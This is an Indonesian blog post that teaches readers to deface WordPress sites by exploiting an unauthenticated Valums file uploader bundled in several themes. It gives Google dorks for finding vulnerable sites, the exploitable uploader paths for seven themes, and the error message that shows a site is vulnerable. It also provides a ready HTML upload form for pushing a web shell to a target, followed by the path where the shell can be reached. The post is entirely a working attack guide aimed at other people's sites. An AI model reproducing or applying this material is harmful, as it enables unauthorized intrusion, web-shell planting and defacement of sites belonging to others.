Header Ads

Deface dengan eXploit WordPress Valums Uploader Shell Upload





Tutorial Deface dengan eXploit WordPress Valums Uploader Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya.

1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php

3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php

4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php

5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php

6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php

7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php


Cara nya Langsung ke Search ke Google pake Dork diatas.

Web Vuln ciri2nya kek gini.. ada tulisan {"error":"No files were uploaded.",



Langsung Buat CRSF pake notepad Save dengan ekstensi html


<form enctype="multipart/form-data"action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>

Kalo males buat bisa pake ini KlikDisini

Pake CSRF Mana aja bisa.. nih contoh web yg File nya sukses terupload.




Shell Akses file: /wp-content/uploads/tahun/bulan/namashell.php
contoh: target.com/wp-content/uploads/2016/12/nueenggak.php


Semoga bermanfaat .. terimakasih. Sampai ketemu di tutorial selanjutnya


No comments:

Silahkan Komentar dengan bahasa yang sopan :)

Powered by Blogger.